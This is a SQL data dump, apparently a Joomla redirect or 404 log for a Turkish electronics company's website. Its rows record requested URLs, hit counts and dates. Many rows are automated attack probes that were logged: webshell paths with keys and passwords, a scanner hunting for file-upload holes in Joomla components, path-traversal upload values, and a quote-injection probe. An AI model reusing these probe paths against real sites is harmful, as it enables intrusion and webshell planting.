10:06:21','0000-00-00 00:00:00',301),(21623,'http://3s-technologies.com.tr/bitrix/admin/seo_script.php',NULL,'','',4,0,'2018-12-24 12:51:18','0000-00-00 00:00:00',301),(21624,'http://3s-technologies.com.tr/hetlerx.php',NULL,'','',3,0,'2018-12-25 09:33:22','0000-00-00 00:00:00',301),(21625,'https://3s-technologies.com.tr/tr/sitemap.xml',NULL,'','',245,0,'2018-12-25 23:52:16','0000-00-00 00:00:00',301),(21626,'http://3s-technologies.com.tr/.well-known/acme-challenge/sq.php',NULL,'','',1,0,'2018-12-26 02:36:54','0000-00-00 00:00:00',301),(21627,'http://3s-technologies.com.tr/forum/cache/licence.php',NULL,'','',1,0,'2018-12-26 02:36:55','0000-00-00 00:00:00',301),(21628,'http://3s-technologies.com.tr/stats/got.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',1,0,'2018-12-26 02:36:55','0000-00-00 00:00:00',301),(21629,'http://3s-technologies.com.tr/core.php',NULL,'','',1,0,'2018-12-26 02:36:55','0000-00-00 00:00:00',301),(21630,'http://3s-technologies.com.tr/functions.php',NULL,'','',5,0,'2018-12-26 02:36:56','0000-00-00 00:00:00',301),(21631,'http://3s-technologies.com.tr/menu.php',NULL,'','',1,0,'2018-12-26 02:36:56','0000-00-00 00:00:00',301),(21632,'http://3s-technologies.com.tr/wp-pot.php',NULL,'','',1,0,'2018-12-26 02:36:57','0000-00-00 00:00:00',301),(21633,'http://3s-technologies.com.tr/wp-xrp.php',NULL,'','',1,0,'2018-12-26 02:36:57','0000-00-00 00:00:00',301),(21634,'http://3s-technologies.com.tr/en/cache_.php',NULL,'','',1,0,'2018-12-26 02:36:58','0000-00-00 00:00:00',301),(21635,'http://3s-technologies.com.tr/en/_private/license.php',NULL,'','',1,0,'2018-12-26 02:36:58','0000-00-00 00:00:00',301),(21636,'http://3s-technologies.com.tr/en/logs/license.php',NULL,'','',1,0,'2018-12-26 02:36:59','0000-00-00 00:00:00',301),(21637,'http://3s-technologies.com.tr/en/tmp/license.php',NULL,'','',1,0,'2018-12-26 02:37:00','0000-00-00 00:00:00',301),(21638,'http://3s-technologies.com.tr/en/templates/license.php',NULL,'','',1,0,'2018-12-26 02:37:01','0000-00-00 00:00:00',301),(21639,'http://3s-technologies.com.tr/en/components/license.php',NULL,'','',1,0,'2018-12-26 02:37:01','0000-00-00 00:00:00',301),(21640,'http://3s-technologies.com.tr/en/language/en-gb/license.php',NULL,'','',1,0,'2018-12-26 02:37:02','0000-00-00 00:00:00',301),(21641,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/new_license.php',NULL,'','',1,0,'2018-12-26 02:37:02','0000-00-00 00:00:00',301),(21642,'http://3s-technologies.com.tr/en/calc/new_license.php',NULL,'','',1,0,'2018-12-26 02:37:03','0000-00-00 00:00:00',301),(21643,'http://3s-technologies.com.tr/en/js/content-post.php',NULL,'','',1,0,'2018-12-26 02:37:04','0000-00-00 00:00:00',301),(21644,'http://3s-technologies.com.tr/en/wp-cofigs.php',NULL,'','',1,0,'2018-12-26 02:37:04','0000-00-00 00:00:00',301),(21645,'http://3s-technologies.com.tr/en/pages/content-post.php',NULL,'','',1,0,'2018-12-26 02:37:05','0000-00-00 00:00:00',301),(21646,'http://3s-technologies.com.tr/en/tmp/content-post.php',NULL,'','',1,0,'2018-12-26 02:37:05','0000-00-00 00:00:00',301),(21647,'http://3s-technologies.com.tr/en/templates/content-post.php',NULL,'','',1,0,'2018-12-26 02:37:06','0000-00-00 00:00:00',301),(21648,'http://3s-technologies.com.tr/en/logs/newsleter.php',NULL,'','',1,0,'2018-12-26 02:37:07','0000-00-00 00:00:00',301),(21649,'http://3s-technologies.com.tr/en/components/newsleter.php',NULL,'','',1,0,'2018-12-26 02:37:07','0000-00-00 00:00:00',301),(21650,'http://3s-technologies.com.tr/en/cgi/newsleter.php',NULL,'','',1,0,'2018-12-26 02:37:08','0000-00-00 00:00:00',301),(21651,'http://3s-technologies.com.tr/en/tmp/newsleter.php',NULL,'','',1,0,'2018-12-26 02:37:08','0000-00-00 00:00:00',301),(21652,'http://3s-technologies.com.tr/en/templates/newsleter.php',NULL,'','',1,0,'2018-12-26 02:37:09','0000-00-00 00:00:00',301),(21653,'http://3s-technologies.com.tr/en/modules/newsleter.php',NULL,'','',1,0,'2018-12-26 02:37:09','0000-00-00 00:00:00',301),(21654,'http://3s-technologies.com.tr/en/js/wp-single.php',NULL,'','',1,0,'2018-12-26 02:37:10','0000-00-00 00:00:00',301),(21655,'http://3s-technologies.com.tr/en/index2.php',NULL,'','',11,0,'2018-12-26 02:37:10','0000-00-00 00:00:00',301),(21656,'http://3s-technologies.com.tr/en/security.php',NULL,'','',12,0,'2018-12-26 02:37:11','0000-00-00 00:00:00',301),(21657,'http://3s-technologies.com.tr/en/validate.php',NULL,'','',1,0,'2018-12-26 02:37:11','0000-00-00 00:00:00',301),(21658,'http://3s-technologies.com.tr/en/wp_interst.php?passwd=123456&action=redate&readfile=wp_interst.php',NULL,'','',1,0,'2018-12-26 02:37:12','0000-00-00 00:00:00',301),(21659,'http://3s-technologies.com.tr/administrator/cache/got.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',1,0,'2018-12-26 02:37:12','0000-00-00 00:00:00',301),(21660,'http://3s-technologies.com.tr/cache/got.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',1,0,'2018-12-26 02:37:12','0000-00-00 00:00:00',301),(21661,'http://3s-technologies.com.tr/cache/sq.php',NULL,'','',1,0,'2018-12-26 02:37:13','0000-00-00 00:00:00',301),(21662,'http://3s-technologies.com.tr/templates/sq.php',NULL,'','',1,0,'2018-12-26 02:37:13','0000-00-00 00:00:00',301),(21663,'http://3s-technologies.com.tr/tmp/sq.php',NULL,'','',1,0,'2018-12-26 02:37:13','0000-00-00 00:00:00',301),(21664,'http://3s-technologies.com.tr/images/sq.php',NULL,'','',1,0,'2018-12-26 02:37:14','0000-00-00 00:00:00',301),(21665,'http://3s-technologies.com.tr/logs/sq.php',NULL,'','',1,0,'2018-12-26 02:37:14','0000-00-00 00:00:00',301),(21666,'http://3s-technologies.com.tr/modules/sq.php',NULL,'','',1,0,'2018-12-26 02:37:14','0000-00-00 00:00:00',301),(21667,'http://3s-technologies.com.tr/administrator/help/wp-infos.php',NULL,'','',1,0,'2018-12-26 02:37:14','0000-00-00 00:00:00',301),(21668,'http://3s-technologies.com.tr/modules/wp-infos.php',NULL,'','',1,0,'2018-12-26 02:37:15','0000-00-00 00:00:00',301),(21669,'http://3s-technologies.com.tr/tmp/wp-infos.php',NULL,'','',1,0,'2018-12-26 02:37:15','0000-00-00 00:00:00',301),(21670,'http://3s-technologies.com.tr/templates/wp-infos.php',NULL,'','',1,0,'2018-12-26 02:37:15','0000-00-00 00:00:00',301),(21671,'http://3s-technologies.com.tr/administrator/wp-infos.php',NULL,'','',1,0,'2018-12-26 02:37:16','0000-00-00 00:00:00',301),(21672,'http://3s-technologies.com.tr/cli/got.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',1,0,'2018-12-26 02:37:16','0000-00-00 00:00:00',301),(21673,'http://3s-technologies.com.tr/logs/got.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',1,0,'2018-12-26 02:37:16','0000-00-00 00:00:00',301),(21674,'http://3s-technologies.com.tr/modules/got.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',1,0,'2018-12-26 02:37:16','0000-00-00 00:00:00',301),(21675,'http://3s-technologies.com.tr/cli/sq.php',NULL,'','',1,0,'2018-12-26 02:37:17','0000-00-00 00:00:00',301),(21676,'http://3s-technologies.com.tr/config.php',NULL,'','',5,0,'2018-12-26 06:22:46','0000-00-00 00:00:00',301),(21677,'http://3s-technologies.com.tr/en/components/db.php?u',NULL,'3s-technologies.com.tr','',1,0,'2018-12-26 11:27:45','0000-00-00 00:00:00',301),(21678,'http://3s-technologies.com.tr/connectors/resource/seo_script.php',NULL,'','',4,0,'2018-12-26 11:32:15','0000-00-00 00:00:00',301),(21679,'http://3s-technologies.com.tr/images/google-assist.php',NULL,'','',4,0,'2018-12-27 07:45:23','0000-00-00 00:00:00',301),(21680,'http://3s-technologies.com.tr/configbak.php',NULL,'','',3,0,'2018-12-27 23:58:49','0000-00-00 00:00:00',301),(21681,'http://3s-technologies.com.tr/home.bak.php',NULL,'','',3,0,'2018-12-28 12:40:39','0000-00-00 00:00:00',301),(21682,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name?error=404',NULL,'','',12,0,'2018-12-28 22:19:43','0000-00-00 00:00:00',301),(21683,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/results,1-100?error=404',NULL,'','',15,0,'2018-12-28 22:20:01','0000-00-00 00:00:00',301),(21684,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/results,1-10?error=404',NULL,'','',12,0,'2018-12-28 22:20:13','0000-00-00 00:00:00',301),(21685,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name?error=404',NULL,'','',13,0,'2018-12-28 22:20:35','0000-00-00 00:00:00',301),(21686,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku?error=404',NULL,'','',12,0,'2018-12-28 22:20:44','0000-00-00 00:00:00',301),(21687,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/results,1-40?error=404',NULL,'','',11,0,'2018-12-28 22:20:50','0000-00-00 00:00:00',301),(21688,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/dirdesc?error=404',NULL,'','',7,0,'2018-12-28 22:21:20','0000-00-00 00:00:00',301),(21689,'http://www.3s-technologies.com.tr/tr/iqclztel.html',NULL,'','',1,0,'2018-12-29 04:16:12','0000-00-00 00:00:00',301),(21690,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/thru-hole',NULL,'','',5,0,'2018-12-29 14:06:35','0000-00-00 00:00:00',301),(21691,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturers/tolo',NULL,'','',8,0,'2018-12-29 14:06:43','0000-00-00 00:00:00',301),(21692,'http://3s-technologies.com.tr/tr/гјrгјnler/smd-dгјеџгјk-hд±zlд±',NULL,'','',1,0,'2018-12-29 14:56:11','0000-00-00 00:00:00',301),(21693,'http://3s-technologies.com.tr/tr//index.php?option=com_user&view=register',NULL,'','',5,0,'2018-12-29 17:08:48','0000-00-00 00:00:00',301),(21694,'http://www.3s-technologies.com.tr/tr/images/jdownloads/screenshots/ds.gif',NULL,'','',1,0,'2018-12-30 01:37:28','0000-00-00 00:00:00',301),(21695,'http://3s-technologies.com.tr/comments.php',NULL,'','',5,0,'2018-12-30 16:57:15','0000-00-00 00:00:00',301),(21696,'http://3s-technologies.com.tr/tr/dsgkahtptpj.html',NULL,'','',1,0,'2018-12-31 05:40:19','0000-00-00 00:00:00',301),(21697,'http://3s-technologies.com.tr/ciosan.php',NULL,'','',3,0,'2018-12-31 10:49:40','0000-00-00 00:00:00',301),(21698,'http://3s-technologies.com.tr/codules.php',NULL,'','',5,0,'2018-12-31 15:23:37','0000-00-00 00:00:00',301),(21699,'http://3s-technologies.com.tr/tr/wp-admin/admin-ajax.php',NULL,'','',51,0,'2018-12-31 15:29:12','0000-00-00 00:00:00',301),(21700,'http://www.3s-technologies.com.tr/en/plesk-stat/webstat/usage_201811.html',NULL,'','',1,0,'2018-12-31 16:54:16','0000-00-00 00:00:00',301),(21701,'http://www.3s-technologies.com.tr/en/webstat/usage_201811',NULL,'','',1,0,'2018-12-31 16:54:16','0000-00-00 00:00:00',301),(21702,'http://www.3s-technologies.com.tr/en/stats/usage_201811.html',NULL,'','',1,0,'2018-12-31 16:54:16','0000-00-00 00:00:00',301),(21703,'http://www.3s-technologies.com.tr/en/webalizer/usage_201811.html',NULL,'','',1,0,'2018-12-31 16:54:16','0000-00-00 00:00:00',301),(21704,'http://3s-technologies.com.tr/google.php',NULL,'','',4,0,'2018-12-31 17:08:14','0000-00-00 00:00:00',301),(21705,'http://3s-technologies.com.tr/components/modules.php',NULL,'','',2,0,'2018-12-31 19:51:50','0000-00-00 00:00:00',301),(21706,'http://3s-technologies.com.tr/admin/language/english/total/seo_script.php',NULL,'','',3,0,'2018-12-31 21:29:28','0000-00-00 00:00:00',301),(21707,'http://3s-technologies.com.tr/images/configurations.php',NULL,'','',3,0,'2018-12-31 21:44:41','0000-00-00 00:00:00',301),(21708,'http://3s-technologies.com.tr/sockarp.php?login=cmd',NULL,'','',3,0,'2019-01-01 01:06:34','0000-00-00 00:00:00',301),(21709,'http://3s-technologies.com.tr/en/plesk-stat/webstat/usage_201811.html',NULL,'','',1,0,'2019-01-01 02:48:26','0000-00-00 00:00:00',301),(21710,'http://3s-technologies.com.tr/en/stats/usage_201811.html',NULL,'','',1,0,'2019-01-01 02:48:26','0000-00-00 00:00:00',301),(21711,'http://3s-technologies.com.tr/en/webstat/usage_201811',NULL,'','',1,0,'2019-01-01 02:48:26','0000-00-00 00:00:00',301),(21712,'http://3s-technologies.com.tr/en/webalizer/usage_201811.html',NULL,'','',1,0,'2019-01-01 02:48:26','0000-00-00 00:00:00',301),(21713,'http://3s-technologies.com.tr/tr/ürün',NULL,'','',1,0,'2019-01-01 06:43:26','0000-00-00 00:00:00',301),(21714,'http://3s-technologies.com.tr/tmpe.php',NULL,'','',5,0,'2019-01-01 07:02:00','0000-00-00 00:00:00',301),(21715,'http://3s-technologies.com.tr/adoni.php',NULL,'','',4,0,'2019-01-02 14:56:48','0000-00-00 00:00:00',301),(21716,'http://3s-technologies.com.tr/bps.php',NULL,'','',3,0,'2019-01-02 16:42:23','0000-00-00 00:00:00',301),(21717,'http://3s-technologies.com.tr/cachee.php',NULL,'','',4,0,'2019-01-02 19:56:19','0000-00-00 00:00:00',301),(21718,'http://3s-technologies.com.tr/brandtalk/administrator/component/w6360n.php',NULL,'','',2,0,'2019-01-02 21:18:56','0000-00-00 00:00:00',301),(21719,'http://3s-technologies.com.tr/tr/backups.php?mode=config&key=c6y1f2ea7217pbtl1flch98sopfo/r1z76/okfae',NULL,'','',4,0,'2019-01-02 21:58:02','0000-00-00 00:00:00',301),(21720,'http://3s-technologies.com.tr/tr/cache.php',NULL,'','',96,0,'2019-01-02 23:43:37','0000-00-00 00:00:00',301),(21721,'http://3s-technologies.com.tr/c0nfig.php',NULL,'','',4,0,'2019-01-03 01:34:11','0000-00-00 00:00:00',301),(21722,'http://3s-technologies.com.tr/brandtalk/administrator/component/w6360n.php.php',NULL,'','',3,0,'2019-01-03 05:13:24','0000-00-00 00:00:00',301),(21723,'http://www.3s-technologies.com.tr/tr/wp/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2019-01-03 12:30:37','0000-00-00 00:00:00',301),(21724,'http://www.3s-technologies.com.tr/tr/wordpress/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2019-01-03 12:30:37','0000-00-00 00:00:00',301),(21725,'http://3s-technologies.com.tr/tr/drupal/readme.txt',NULL,'','',1,0,'2019-01-04 02:44:19','0000-00-00 00:00:00',301),(21726,'http://3s-technologies.com.tr/tr/forum/readme.txt',NULL,'','',1,0,'2019-01-04 02:44:19','0000-00-00 00:00:00',301),(21727,'http://3s-technologies.com.tr/tr/test/readme.txt',NULL,'','',1,0,'2019-01-04 02:44:20','0000-00-00 00:00:00',301),(21728,'http://3s-technologies.com.tr/tr/store/readme.txt',NULL,'','',1,0,'2019-01-04 02:44:20','0000-00-00 00:00:00',301),(21729,'http://3s-technologies.com.tr/tr/shop/readme.txt',NULL,'','',1,0,'2019-01-04 02:44:20','0000-00-00 00:00:00',301),(21730,'http://www.3s-technologies.com.tr/en/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../test.php',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../test.php','',1,0,'2019-01-04 13:24:39','0000-00-00 00:00:00',301),(21731,'http://www.3s-technologies.com.tr/en/wp-content/plugins/dopts',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/dopts/','',1,0,'2019-01-04 16:03:38','0000-00-00 00:00:00',301),(21732,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim',NULL,'','',5,0,'2019-01-04 18:08:38','0000-00-00 00:00:00',301),(21733,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/rh2-20-detail',NULL,'','',7,0,'2019-01-04 18:10:54','0000-00-00 00:00:00',301),(21734,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/avf-detail',NULL,'','',4,0,'2019-01-04 18:11:02','0000-00-00 00:00:00',301),(21735,'http://www.3s-technologies.com.tr/tr/jmugslclp.html',NULL,'','',1,0,'2019-01-06 08:39:41','0000-00-00 00:00:00',301),(21736,'http://3s-technologies.com.tr/tr/images/vuln.htm',NULL,'','',3,0,'2019-01-07 09:08:04','0000-00-00 00:00:00',301),(21737,'http://3s-technologies.com.tr/tr/avikunjtbyg.html',NULL,'','',1,0,'2019-01-08 09:30:40','0000-00-00 00:00:00',301),(21738,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/dirdesc',NULL,'','',13,0,'2019-01-10 03:14:08','0000-00-00 00:00:00',301),(21739,'http://www.3s-technologies.com.tr/tr/&nx=119&ny=13&clkt=46&bg=!n5ylnirej4fxa7m7oy8caaabd1iaaab6mqgkpm4noycpz3st9w1aq5fwqwvukd82-mumvq4l2ov6sdcisalxqw8dvbj8hytqtpf0idyi_1m4m5vzzixao0lhlmffjnrcd791w_y6qmsod5l3bpjsfyg71ox3o4jati1sdb02k2of2fihsp2w6-sa2x34l1hec5qdkkayrsyddhaozhmh_qc5l0prfhrujgfl357fcnprqj21ftioi-47ymjxvdntep000zvviqwhp5ytuevssjw1rxq7rbywgjmxbbm1_2c6i6e9gr7krhbirxvdiucxqnbf3f1wzarperdkmcgfn22abr15mdm4sgf9eovaw8roegensjsxrkzl0f3snqobv-whoppfodnt7mxf3izw74h7v-rqqrd21bxsjgpau4g2ibltqvdlpftxi-19wrrsb7zkj894cvtyrf6jjsdcqya__kvpsmwxqlxjmpktga4d57y3fu3ffhk4lu7_2shg06fot5yjex9zfmmf7ve64ynyvn9qfasdpzvb3rsigrkdezjaaa',NULL,'https://www.google.com/','',1,0,'2019-01-10 21:14:55','0000-00-00 00:00:00',301),(21740,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-list?id=50&language=tr-tr',NULL,'','',25,0,'2019-01-13 06:45:12','0000-00-00 00:00:00',301),(21741,'http://3s-technologies.com.tr/tr//\'\"`',NULL,'http://www.google.com/\'\"`','',1,0,'2019-01-13 08:40:57','0000-00-00 00:00:00',301),(21742,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,mf_name/results,1-50',NULL,'','',3,0,'2019-01-13 15:52:48','0000-00-00 00:00:00',301),(21743,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,category_name/results,1-50',NULL,'','',3,0,'2019-01-13 15:53:04','0000-00-00 00:00:00',301),(21744,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_sku/results,1-50',NULL,'','',3,0,'2019-01-13 15:53:35','0000-00-00 00:00:00',301),(21745,'http://www.3s-technologies.com.tr/tr/wvbcoutixfsrim.html',NULL,'','',1,0,'2019-01-14 01:30:15','0000-00-00 00:00:00',301),(21746,'http://3s-technologies.com.tr/tr/\r/wp-includes/js/jquery/jquery.js',NULL,'','',1,0,'2019-01-14 05:21:18','0000-00-00 00:00:00',301),(21747,'http://3s-technologies.com.tr/tr/\r/wp-login.php',NULL,'','',2,0,'2019-01-14 05:21:18','0000-00-00 00:00:00',301),(21748,'http://3s-technologies.com.tr/tr/\r/language/en-gb/en-gb.xml',NULL,'','',3,0,'2019-01-14 05:21:19','0000-00-00 00:00:00',301),(21749,'http://3s-technologies.com.tr/tr/\r/forum/register.php',NULL,'','',1,0,'2019-01-14 05:21:19','0000-00-00 00:00:00',301),(21750,'http://3s-technologies.com.tr/tr/\r/administrator/',NULL,'','',1,0,'2019-01-14 05:21:19','0000-00-00 00:00:00',301),(21751,'http://3s-technologies.com.tr/tr/\r/joomla/',NULL,'','',1,0,'2019-01-14 05:21:20','0000-00-00 00:00:00',301),(21752,'http://3s-technologies.com.tr/tr/\r/admin',NULL,'','',1,0,'2019-01-14 05:21:20','0000-00-00 00:00:00',301),(21753,'http://3s-technologies.com.tr/tr/\r/user/login',NULL,'','',1,0,'2019-01-14 05:21:20','0000-00-00 00:00:00',301),(21754,'http://3s-technologies.com.tr/tr/\r/rss.xml',NULL,'','',1,0,'2019-01-14 05:21:21','0000-00-00 00:00:00',301),(21755,'http://3s-technologies.com.tr/tr/\r/xattacker.php?x=attacker',NULL,'','',3,0,'2019-01-14 05:21:22','0000-00-00 00:00:00',301),(21756,'http://3s-technologies.com.tr/tr/\r/xattacker.gif',NULL,'','',1,0,'2019-01-14 05:21:23','0000-00-00 00:00:00',301),(21757,'http://3s-technologies.com.tr/tr/\rcomponents/com_oziogallery/imagin/scripts_ralcr/filesystem/writetofile.php',NULL,'','',1,0,'2019-01-14 05:21:23','0000-00-00 00:00:00',301),(21758,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_simplephotogallery/lib/uploadfile.php',NULL,'','',1,0,'2019-01-14 05:21:24','0000-00-00 00:00:00',301),(21759,'http://3s-technologies.com.tr/tr/\r/xattacker\'..\'',NULL,'','',1,0,'2019-01-14 05:21:24','0000-00-00 00:00:00',301),(21760,'http://3s-technologies.com.tr/tr/\r/images/xattacker.txt',NULL,'','',1,0,'2019-01-14 05:21:25','0000-00-00 00:00:00',301),(21761,'http://3s-technologies.com.tr/tr/\rindex.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',2,0,'2019-01-14 05:21:25','0000-00-00 00:00:00',301),(21762,'http://3s-technologies.com.tr/tr/\r/images/jdownloads/screenshots/xattacker.php.j?x=attacker',NULL,'','',1,0,'2019-01-14 05:21:26','0000-00-00 00:00:00',301),(21763,'http://3s-technologies.com.tr/tr/\r/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',2,0,'2019-01-14 05:21:26','0000-00-00 00:00:00',301),(21764,'http://3s-technologies.com.tr/tr/\r/media/xattacker.php?x=attacker',NULL,'','',1,0,'2019-01-14 05:21:26','0000-00-00 00:00:00',301),(21765,'http://3s-technologies.com.tr/tr/\r/media/xattacker.txt',NULL,'','',1,0,'2019-01-14 05:21:27','0000-00-00 00:00:00',301),(21766,'http://3s-technologies.com.tr/tr/\r/index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',2,0,'2019-01-14 05:21:27','0000-00-00 00:00:00',301),(21767,'http://3s-technologies.com.tr/tr/\r/xattacker.txt',NULL,'','',1,0,'2019-01-14 05:21:28','0000-00-00 00:00:00',301),(21768,'http://3s-technologies.com.tr/tr/\r/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',1,0,'2019-01-14 05:21:28','0000-00-00 00:00:00',301),(21769,'http://3s-technologies.com.tr/tr/\r/components/com_jbcatalog/libraries/jsupload/server/php/files/xattacker.php?x=attacker',NULL,'','',1,0,'2019-01-14 05:21:29','0000-00-00 00:00:00',301),(21770,'http://3s-technologies.com.tr/tr/\r/modules/mod_socialpinboard_menu/saveimagefromupload.php',NULL,'','',1,0,'2019-01-14 05:21:29','0000-00-00 00:00:00',301),(21771,'http://3s-technologies.com.tr/tr/\r/modules/mod_socialpinboard_menu/images/socialpinboard/temp/								<p><a href=\"/index.php?x=attacker',NULL,'','',1,0,'2019-01-14 05:21:29','0000-00-00 00:00:00',301),(21772,'http://3s-technologies.com.tr/tr/\r/components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',1,0,'2019-01-14 05:21:29','0000-00-00 00:00:00',301),(21773,'http://3s-technologies.com.tr/tr/\r/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',1,0,'2019-01-14 05:21:30','0000-00-00 00:00:00',301),(21774,'http://3s-technologies.com.tr/tr/\r/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',NULL,'','',1,0,'2019-01-14 05:21:30','0000-00-00 00:00:00',301),(21775,'http://3s-technologies.com.tr/tr/\r/components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',1,0,'2019-01-14 05:21:30','0000-00-00 00:00:00',301),(21776,'http://3s-technologies.com.tr/tr/\r/components/com_foxcontact/_func.php?x=attacker.php',NULL,'','',1,0,'2019-01-14 05:21:30','0000-00-00 00:00:00',301),(21777,'http://3s-technologies.com.tr/tr/\r//kontakty',NULL,'','',1,0,'2019-01-14 05:21:31','0000-00-00 00:00:00',301),(21778,'http://3s-technologies.com.tr/tr/\r/kontakty.html',NULL,'','',1,0,'2019-01-14 05:21:31','0000-00-00 00:00:00',301),(21779,'http://3s-technologies.com.tr/tr/\r/contatti.html',NULL,'','',1,0,'2019-01-14 05:21:31','0000-00-00 00:00:00',301),(21780,'http://3s-technologies.com.tr/tr/\r//index.php/kontakty',NULL,'','',1,0,'2019-01-14 05:21:31','0000-00-00 00:00:00',301),(21781,'http://3s-technologies.com.tr/tr/\r//contact',NULL,'','',1,0,'2019-01-14 05:21:32','0000-00-00 00:00:00',301),(21782,'http://3s-technologies.com.tr/tr/\r/contacto',NULL,'','',1,0,'2019-01-14 05:21:32','0000-00-00 00:00:00',301),(21783,'http://3s-technologies.com.tr/tr/\r//index.php/contato.html',NULL,'','',1,0,'2019-01-14 05:21:32','0000-00-00 00:00:00',301),(21784,'http://3s-technologies.com.tr/tr/\r/en/contact',NULL,'','',1,0,'2019-01-14 05:21:32','0000-00-00 00:00:00',301),(21785,'http://3s-technologies.com.tr/tr/\r/contactenos',NULL,'','',1,0,'2019-01-14 05:21:33','0000-00-00 00:00:00',301),(21786,'http://3s-technologies.com.tr/tr/\r/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2019-01-14 05:21:33','0000-00-00 00:00:00',301),(21787,'http://3s-technologies.com.tr/tr/\r/tmp/plupload/xattacker.html',NULL,'','',1,0,'2019-01-14 05:21:33','0000-00-00 00:00:00',301),(21788,'http://3s-technologies.com.tr/tr/\r/index.php?option=com_myblog&task=ajaxupload',NULL,'','',1,0,'2019-01-14 05:21:33','0000-00-00 00:00:00',301),(21789,'http://3s-technologies.com.tr/tr/\rindex.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../izoc.php',NULL,'','',1,0,'2019-01-14 05:21:34','0000-00-00 00:00:00',301),(21790,'http://3s-technologies.com.tr/tr/\r/components/com_b2jcontact/uploads/izoc.php',NULL,'','',1,0,'2019-01-14 05:21:34','0000-00-00 00:00:00',301),(21791,'http://3s-technologies.com.tr/tr/\r/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2019-01-14 05:21:34','0000-00-00 00:00:00',301),(21792,'http://3s-technologies.com.tr/tr/\r/com_sexycontactform/fileupload/files/xattacker.php?x=attacker',NULL,'','',1,0,'2019-01-14 05:21:34','0000-00-00 00:00:00',301),(21793,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',1,0,'2019-01-14 05:21:35','0000-00-00 00:00:00',301),(21794,'http://3s-technologies.com.tr/tr/\r/images/stories/xattacker.php.xxxjpg?x=attacker',NULL,'','',2,0,'2019-01-14 05:21:35','0000-00-00 00:00:00',301),(21795,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_extplorer/uploadhandler.php',NULL,'','',1,0,'2019-01-14 05:21:35','0000-00-00 00:00:00',301),(21796,'http://3s-technologies.com.tr/tr/\r/images/xattacker.gif',NULL,'','',1,0,'2019-01-14 05:21:37','0000-00-00 00:00:00',301),(21797,'http://3s-technologies.com.tr/tr/\r/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',1,0,'2019-01-14 05:21:37','0000-00-00 00:00:00',301),(21798,'http://3s-technologies.com.tr/tr/\r/modules/mod_simplefileuploadv1.3/elements/xattacker.php?x=attacker',NULL,'','',1,0,'2019-01-14 05:21:37','0000-00-00 00:00:00',301),(21799,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2019-01-14 05:21:38','0000-00-00 00:00:00',301),(21800,'http://3s-technologies.com.tr/tr/\r/administrator/components/com_bt_portfolio/xattacker.php?x=attacker',NULL,'','',1,0,'2019-01-14 05:21:38','0000-00-00 00:00:00',301),(21801,'http://3s-technologies.com.tr/tr/\r/index.php?option=com_jwallpapers&task=upload',NULL,'','',1,0,'2019-01-14 05:21:38','0000-00-00 